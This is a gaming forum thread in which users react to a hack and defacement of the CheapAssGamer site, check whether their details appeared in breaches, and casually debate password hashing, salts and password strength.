Support NeoGAF

[topplehat]

From Cheapy



https://www.cheapassgamer.com/topic/353549-cag-defacinghacking-news-updates/

Good response, way to go Cheapy.

 

[shanafan]

I don't even remember ever creating Adobe and Moneybooker accounts. Why the HELL would I have one of those?

The website said Final Fantasy Shrine was breached, and my e-mail address was included.

I don't play Final Fantasy, so why would I go there?

 

[minameissteve]

The website said Final Fantasy Shrine was breached, and my e-mail address was included.

I don't play Final Fantasy, so why would I go there?

A lot of people go there for game OST rips. I had the same notification.

 

[RedAssedApe]

Why does gaf always come up for no reason on these other sites lol

 

[Ivan Amiibo]

The website said Final Fantasy Shrine was breached, and my e-mail address was included.

I don't play Final Fantasy, so why would I go there?

To pirate something

 

[Rurunaki]

Oh noes hacked via Xsplit...when did I even create an account?

Me and you brother.. me and you..

 

[davidwhangchoi]

glad they're back up =)

 

[RelentlessRolento]

Scary to hear one of my longtime stomping grounds get throttled

Glad it's mostly ok now.

 

[sensi97]

About CheapyD's post

1) Your passwords are combined with a random set of characters and then hashed to create a unique fingerprint, and only this is stored in our database.
This is impossible to reverse engineer, so if you use your CAG password on other sites, they would not be compromised.

No. If a password is weak (CAG allow passwords with 3 characters), the hackers will find it (wordlist or bruteforce). Hash+salt doesn't protect weak passwords.

 

[10k]

My details have already leaked in (at least) 3 major hacks:



One can check their own email address at https://haveibeenpwned.com/
And it's possible to get notified automatically.


edit: entering my user name finds a 4th breach: Battlefield Heroes.
TOP KEK

Wow. Just checked as Many of my emails and usernames I can remember. I'm all green across the board. Lucky me.

 

[The_Inquisitor]

About CheapyD's post


No. If a password is weak (CAG allow passwords with 3 characters), the hackers will find it (wordlist or bruteforce). Hash+salt doesn't protect weak passwords.

I did an experiment once. If your password is greater than 5 characters and you happen to have some sort of punctuation and/or a capital letter it takes a LONG time to brute force. Moreso on the order of several years depending on how much hardware you are paying for/using. If the encryption was good, most users should generally be okay. Ouch at those who thought a 3 character passy was safe.

 

[NolbertoS]

Why does gaf always come up for no reason on these other sites lol

GAF > CAG > GAF

 

[Crv756]

what's a jabber?

I think it the same as a scrobler.

https://www.youtube.com/watch?v=Gmomcik_S5o

 

[Polk]

I don't even remember ever creating Adobe and Moneybooker accounts. Why the HELL would I have one of those?

That free adobe premiere pro?

 

[skullmuffins]

I did an experiment once. If your password is greater than 5 characters and you happen to have some sort of punctuation and/or a capital letter it takes a LONG time to brute force. Moreso on the order of several years depending on how much hardware you are paying for/using. If the encryption was good, most users should generally be okay. Ouch at those who thought a 3 character passy was safe.

Well, password crackers generally don't go straight for simple brute force. They'll do dictionary attacks and then permutations (like $ instead of S, etc). A shorter password that's truly random is more secure than a password that's generated from one word, two words combined, a pattern on your keyboard, etc. In any case,

1) Your passwords are combined with a random set of characters and then hashed to create a unique fingerprint, and only this is stored in our database. This is impossible to reverse engineer, so if you use your CAG password on other sites, they would not be compromised.

is overstating it. Salts (the "random set of characters" your password is combined with) are stored somewhere on the DB, so if they got in, it's safe to assume they got the salts as well. It's not "impossible" to crack, just more difficult, and possibly not worth the time, depending on which hashing algorithm they used.

 

[inm8num2]

Site and forums are working but the front page shows this:

 

[reKon]

What a bunch of childish shit... ugh

 

[Adam Tyner]

depending on which hashing algorithm they used.

CAG uses IP.Board, and their documentation sez:

The hash is the md5 sum of the md5 sum of the salt concatenated to the md5 sum of the plaintext password. Expressed in PHP code, this is as follows:

$hash = md5( md5( $salt ) . md5( $password ) );

The salt is a random 5 character string that's stored in the same database table.

 

[thenexus6]

The CAG cast was the first podcast I ever listened to back in 2007 and never missed an episode since. And although I live in the UK so never really get deals from the site I visit the forums very regularly.

Shout out to John getting the site back up so soon.

 

[That Damn Kid]

WHAT THE HELL

 

[ViciousDS]

the remarks make it sound like a childish kid using scripts at this point to just intercept the IP to display his garbage message. Which would explain why the main page.....actually loads sometimes and isn't always down.

 

[NolbertoS]

Well, I changed my password last night with more random numbers, so doubt I'll be affected. Still sucks CAG isn't back up

 

[entremet]

What did CheapyD do to anyone?

Strange some people or person have this vendetta against the site.

 

[low-G]

CAG uses IP.Board, and their documentation sez:

The salt is a random 5 character string that's stored in the same database table.

md5 is completely broken now, no one should be using it. Might be how the kid is logging in as web admin.

To be clear, there are MULTIPLE passwords which may log you into a CAG account, if they're using md5, and md5'ing 2 md5 concatenated elements seems like a flawed cryptography method even if it wasn't md5 (I cannot mathematically prove this right now, but my crypto senses are tingling, something about using an even number of discrete elements)

At the very least, consider CAG passwords compromised.

 

[MrTroubleMaker]

again

 

[Fox318]

yikes

 

[tebunker]

It's funny though because the forums over there are just plugging along again.

I wonder what this cmd person actually did or got? Because I would have thought that if he really cared he would have shut it all down and shut out everything.

 

[masq]

 

[BiggNife]

man I am glad I transitioned to using Lastpass for everything about a year ago.

 

[Chris1]

Yeah, salts and hashed passwords don't mean your passwords are secure lol.

It's more likely that they aren't cracking the hashes/salts exactly, but instead using a dictionary attack to bruteforce the password. So if you have a difficult password you should be fine but if you have a relatively easy password you're fucked.

Bad password: 123456 (Guaranteed to be leaked/bruteforced)
Bad but "looks good" password: Bob73873873899 (Not guaranteed but highly possible with a list generator)
Good password: Bob834kjs82'2$$"!##£$^& (virtually impossible within a reasonable timeframe)

 

[Ehker]

Not sure if cache issue, but I keep refreshing and it seems like they keep fixing it for awhile, until it keeps getting reverted back to the hacked page.

 

[FantasticMrSnake]

This things are really annoying. Why do you have to hack a site or do something malicious because you think is not secure enough?
It's not your problem, and it's not yours, you are just bothering a lot of people thinking you are smart or doing them a favor but your are not.

Spoiler

Leave cheapassgamers alone!!

 

[Visualante2]

Requested my account be deleted. Same as Patreon, Videogamesplus etc
thanks for the update.

 

[TheSeks]

what's a jabber?

An Instant Messenger client, similar to AIM/YIM/MSN/ICQ but less popular.

Shout out to John getting the site back up so soon.

I dunno about that...

"WHY ARE YOU BACK HERE!?" as a title along with them putting the "child molestor"'s e-mail out there apparently?

md5 is completely broken now, no one should be using it. Might be how the kid is logging in as web admin.

Look at that Invision Board article: It's from 2010. So, not recent. It was only updated last in 2012.

That said, I'm wondering if they ever updated that code.

 

[Übermatik]

Whats with the Bitcoin image?

 

[TheSeks]

Whats with the Bitcoin image?

"Hacker" currency extraordinaire.

But they haven't gotten the memo.

"Bitcoins a failure."

 

[That Damn Kid]

Looks like they're doing maintenance now

https://www.cheapassgamer.com/forum/10-video-game-deals/

 

[That Damn Kid]

New update

"Unfortunately CAG is undergoing extensive upgrades and will be offline for 8-12 hours. Check back soon!"

 

[BY2K]

Wait, this is still going on!?

 

[Olengie]

Pls dont be CAG 4.0

 

[MaverickHunterX]

Again with this shit? Poor cheapyd...

He should call this fuck out, Iron Man 3 style!

https://www.youtube.com/watch?v=_8argqw-KCo

 

[QualityPixel]

man I am glad I transitioned to using Lastpass for everything about a year ago.

Got some bad news for you then.
https://www.seancassidy.me/lostpass.html

 

[Curufinwe]

Sucks for Cheapy.

But it will make for an interesting CAGcast.

 

[inm8num2]

Oh dear...

 

[That Damn Kid]

Jesus Christ...

 

[CollectedDust]

Oh dear...

Wow... I can't believe this is still happening. Poor CheapyD.

 

[Dr. Zoidberg]

This sucks but luckily my password there is pseudo-random gibberish so I'm not really concerned. I'll just change it when they finally get the site fixed.

 

[ViciousDS]

Oh dear...

Andrejordoneeesshhhhhh.gif

 

[Like the hat?]

Apparently I had used the same password for Minecraft because my mojang account was compromised

 

[SmokedMeat]

Who attacks CAG? What a bunch of little bitches.